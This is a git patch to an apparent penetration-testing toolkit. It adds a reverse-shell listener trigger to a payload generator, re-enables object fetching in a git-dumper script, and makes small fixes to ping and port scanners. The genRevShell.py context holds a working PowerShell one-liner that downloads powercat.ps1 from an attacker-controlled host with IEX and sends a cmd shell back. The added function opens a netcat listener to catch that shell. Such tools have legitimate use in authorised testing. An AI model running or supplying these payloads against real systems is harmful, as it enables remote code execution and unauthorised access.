From ec70ac9c603d71dff5f1c65a9dfb13d7c9a5a603 Mon Sep 17 00:00:00 2001 From: Roman Hergenreder Date: Fri, 14 May 2021 16:49:49 +0200 Subject: [PATCH] Ping/Portscan update, git-dumper fix, genRevShell trigger shell --- genRevShell.py | 5 +++++ git-dumper.py | 11 ++++++----- pingscan.py | 10 +++------- portscan.py | 12 ++++-------- 4 files changed, 18 insertions(+), 20 deletions(-) diff --git a/genRevShell.py b/genRevShell.py index 934a595..7ae7dc7 100755 --- a/genRevShell.py +++ b/genRevShell.py @@ -28,6 +28,11 @@ def generatePayload(type, local_address, port): elif type == "powercat" or type == "powershell": return "powershell.exe -c \"IEX(New-Object System.Net.WebClient).DownloadString('http://%s/powercat.ps1');powercat -c %s -p %d -e cmd\"" % (local_address, local_address, port) +def triggerShell(func, port): + func() + pty.spawn(["nc", "-lvvp", str(port)]) + + if __name__ == "__main__": if len(sys.argv) < 2: diff --git a/git-dumper.py b/git-dumper.py index c0ed82e..3958534 100755 --- a/git-dumper.py +++ b/git-dumper.py @@ -453,6 +453,7 @@ def fetch_git(url, directory, jobs, retry, timeout, module=".git"): os.path.join(directory, module, 'FETCH_HEAD'), os.path.join(directory, module, 'ORIG_HEAD'), ] + for dirpath, _, filenames in os.walk(os.path.join(directory, module, 'refs')): for filename in filenames: files.append(os.path.join(dirpath, filename)) @@ -496,11 +497,11 @@ def fetch_git(url, directory, jobs, retry, timeout, module=".git"): # fetch all objects printf('[-] Fetching objects\n') - # process_tasks(objs, - # FindObjectsWorker, - # jobs, - # args=(url, directory, retry, timeout, module), - # tasks_done=packed_objs) + process_tasks(objs, + FindObjectsWorker, + jobs, + args=(url, directory, retry, timeout, module), + tasks_done=packed_objs) # git checkout if module == ".git": diff --git a/pingscan.py b/pingscan.py index 1acec30..58301bd 100644 --- a/pingscan.py +++ b/pingscan.py @@ -4,20 +4,16 @@ import sys import os import ipaddress import subprocess -from importlib import util -threading_spec = util.find_spec("threading") -queue_spec = util.find_spec("queue") - -if threading_spec is not None and queue_spec is not None: +try: import threading import queue NUM_THREADS = 10 THREADING_ENABLED = True QUEUE = queue.Queue() -else: +except: THREADING_ENABLED = False - + def checkHost(host): proc = subprocess.Popen(["ping", str(host), "-c", "1"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) return proc.wait() == 0 diff --git a/portscan.py b/portscan.py index a6e850c..f385e05 100644 --- a/portscan.py +++ b/portscan.py @@ -3,22 +3,18 @@ import socket import sys import re -from importlib import util -threading_spec = util.find_spec("threading") -queue_spec = util.find_spec("queue") - -if threading_spec is not None and queue_spec is not None: +try: import threading import queue NUM_THREADS = 10 THREADING_ENABLED = True QUEUE = queue.Queue() -else: +except: THREADING_ENABLED = False if len(sys.argv) < 2: - print("Usage: %s [ports] [num_threads]") + print("Usage: %s [ports] [num_threads]" % sys.argv[0]) exit(1) host = sys.argv[1] @@ -26,7 +22,7 @@ ports = range(1,1001) if len(sys.argv) >= 3: ports_param = sys.argv[2] - pattern = re.compile("^(\\d)+(-(\\d+)?)?$") + pattern = re.compile("^(\\d+)(-(\\d+)?)?$") m = pattern.match(ports_param) if m is None: print("Invalid port range")